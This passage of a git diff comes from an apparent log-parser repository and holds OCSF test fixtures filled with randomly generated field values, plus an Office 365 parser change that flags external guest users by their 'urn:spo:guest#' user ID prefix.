lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}", + "event": { + "action": "stop", + "category": [], + "outcome": "failure", + "provider": "foo canada biodiversity", + "reason": "gear technologies garlic", + "severity": 3, + "start": "2024-11-12T08:21:47.936000Z", + "type": [] + }, + "@timestamp": "2024-11-12T08:21:47.936000Z", + "file": { + "directory": "vg tunisia river/favorite.wsf", + "hash": { + "sha1": "9280AE13A255F18D841739D0D18222BB950C8FC7" + }, + "name": "developmental.otf", + "path": "vg tunisia river/favorite.wsf/developmental.otf", + "type": "Regular File" + }, + "host": { + "id": "29092d44-a0cf-11ef-8baa-0242ac110007", + "risk": { + "static_level": "Critical" + }, + "type": "IDS" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Stop", + "class_name": "Windows Service Activity", + "class_uid": 201004, + "process": { + "parent": { + "user": { + "full_name": "Roland Nichol" + } + }, + "user": { + "domain": "tuition gst cheese", + "full_name": "Lynsey Sherise", + "groups": [ + { + "name": "overview friendly ul" + } + ] + } + } + }, + "process": { + "command_line": "hdtv il murder", + "entity_id": "2909c8d0-a0cf-11ef-82af-0242ac110007", + "name": "Don", + "parent": { + "command_line": "bull retailers sensitivity", + "end": "2024-11-12T08:21:47.935000Z", + "entity_id": "290a756e-a0cf-11ef-86a9-0242ac110007", + "name": "Indoor", + "pid": 29, + "start": "2024-11-12T08:21:47.900000Z", + "user": { + "id": [ + "290a520a-a0cf-11ef-a44f-0242ac110007" + ], + "name": "Asian" + } + }, + "pid": 38, + "start": "2024-11-12T08:21:47.895000Z", + "user": { + "id": [ + "2909b99e-a0cf-11ef-946c-0242ac110007" + ], + "name": "Journal" + } + }, + "related": { + "hash": [ + "9280AE13A255F18D841739D0D18222BB950C8FC7" + ], + "user": [ + "Hearing" + ] + }, + "user": { + "domain": "thinking answered refurbished", + "id": "290fefee-a0cf-11ef-ba87-0242ac110007", + "name": "Hearing" + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json new file mode 100644 index 000000000..c6192eda7 --- /dev/null +++ b/OCSF/ocsf/tests/test_network_activity_7.json @@ -0,0 +1,42 @@ +{ + "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "sekoiaio": { + "intake": { + "dialect": "OCSF [BETA]", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + } + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "event": { + "action": "unknown", + "category": [ + "network" + ], + "end": "2024-11-13T20:24:18Z", + "kind": "event", + "severity": 1, + "start": "2024-11-13T20:23:47Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-13T20:23:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "availability_zone": "euw3-az1", + "provider": "AWS", + "region": "eu-west-3" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Network Activity", + "class_uid": 4001 + } + } +} \ No newline at end of file diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 96bb48e86..dfa4178de 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,6 +408,11 @@ office365.logon_error: name: office365.logon_error type: keyword +office365.operation.properties: + description: A list of objects describing the operation + name: office365.operation.properties + type: object + office365.record_type: description: The type of the operation name: office365.record_type @@ -508,6 +513,11 @@ office365.user_type.code: name: office365.user_type.code type: long +office365.user_type.is_external: + description: Whether user is external + name: office365.user_type.is_external + type: boolean + office365.user_type.name: description: The translated type of the user that performed the operation name: office365.user_type.name diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..8568883db 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -77,7 +77,7 @@ stages: event.action: "{{json_event.message.Operation}}" event.code: "{{json_event.message.RecordType | string}}" event.reason: "{{json_event.message.ActionName}}" - user.name: "{{json_event.message.UserId}}" + user.name: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" user.id: "{{json_event.message.UserKey}}" organization.id: "{{json_event.message.OrganizationId}}" action.id: "{{json_event.message.RecordType}}" @@ -89,9 +89,12 @@ stages: filter: "{{parse_client_ip.result.ip | is_ipaddress}}" - set: - user.email: "{{json_event.message.UserId}}" + user.email: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" filter: '{{"@" in json_event.message.UserId}}' + - set: + office365.user_type.is_external: "{{'urn:spo:guest#' in json_event.message.UserId}}" + - set: source.ip: "{{parse_client_ip_address.result.ip}}" source.port: "{{parse_client_ip_address.result.port}}" @@ -118,6 +121,21 @@ stages: 